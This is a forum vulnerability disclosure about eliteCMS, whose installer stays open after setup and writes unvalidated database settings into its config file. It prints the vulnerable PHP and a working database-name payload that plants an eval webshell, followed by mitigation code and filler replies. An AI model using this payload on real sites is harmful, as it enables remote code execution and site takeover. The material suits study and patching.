
eliteCMS installer not locked after setup + one-line webshell write vulnerability

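Posted on 2012-11-26 05:58:06
The eliteCMS installer is not locked after installation finishes, so hackers can run the installation again simply by visiting the installer's address. A second vulnerability is that the installer can write a one-line backdoor directly into admin/includes/config.php.
Let's look at the code: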

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
... (omitted) ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...

Now look at this code:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken without any validation.
If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor will be written to /admin/includes/config.php
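One way to close both holes described in the post above, shown as an added example that is not part of the original post and is not eliteCMS code. The lock-file name `install.lock` and every function name are hypothetical; it validates each setting against an allow-list, emits values with `var_export()` so they cannot leave the string literal, and creates a lock so the installer cannot be replayed.

```php
<?php
// Added example, not eliteCMS code. install.lock and all function names are hypothetical.
const LOCK_FILE = __DIR__ . '/install.lock';

// The installer entry point should call this first and refuse to continue when it is true.
function installer_locked(string $lock = LOCK_FILE): bool { return is_file($lock); }

// Allow-list check for one database setting; unknown keys are rejected.
function valid_setting(string $key, string $value): bool
{
    $patterns = [
        'DB_SERVER' => '/\A[A-Za-z0-9.\-]{1,253}(:\d{1,5})?\z/',
        'DB_NAME'   => '/\A[A-Za-z0-9_]{1,64}\z/',
        'DB_USER'   => '/\A[A-Za-z0-9_]{1,32}\z/',
        'DB_PASS'   => '/\A[^\x00-\x1F\x7F]{0,128}\z/', // may contain quotes and tags
    ];
    return isset($patterns[$key]) && preg_match($patterns[$key], $value) === 1;
}

// Build the config source; var_export() emits each value as an escaped string literal.
function build_config(array $in): string
{
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $value = $in[$key] ?? '';
        if (!is_string($value) || !valid_setting($key, $value)) {
            throw new InvalidArgumentException("Rejected value for $key");
        }
        $out .= "define('$key', " . var_export($value, true) . ");\n";
    }
    return $out;
}

// Write the config, then create the lock so the installer cannot be run a second time.
function finish_install(string $configPath, array $in, string $lock = LOCK_FILE): void
{
    if (installer_locked($lock)) {
        throw new RuntimeException('Installer is locked');
    }
    if (file_put_contents($configPath, build_config($in), LOCK_EX) === false) {
        throw new RuntimeException('Could not write config');
    }
    touch($lock);
}

// Constructed sample input: a database name carrying PHP tags, with an inert comment as body.
$sample = ['DB_SERVER' => 'localhost', 'DB_NAME' => '"?><?php /* constructed */ ?><?php', 'DB_USER' => 'cms', 'DB_PASS' => 'x'];
try { build_config($sample); } catch (InvalidArgumentException $e) { echo $e->getMessage(), "\n"; }
echo var_export($sample['DB_NAME'], true), "\n"; // var_export keeps the value inside one quoted literal
```

Deleting the install directory after setup achieves the same result as the lock file and removes the code path entirely.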
Posted on 2012-11-29 16:18:33
Keep it up!!!! Bump!!!!!
Posted on 2012-12-3 08:10:03
Heh, got it
Posted on 2012-12-5 21:10:15
Taking another look today
Posted on 2012-12-9 20:54:50
Had nothing to do today so I dropped by, took a look, and it seems quite good.
Posted on 2012-12-10 20:59:28
Wishing everyone good luck
Posted on 2014-10-3 10:52:55
I'm new here, please look after me...
Posted on 2014-10-17 04:16:35
His Majesty needs to rest now..............
Posted on 2015-1-26 09:54:41
@,@.. what does that mean?
Posted on 2015-2-28 11:46:39
Nice, nice, I like reading this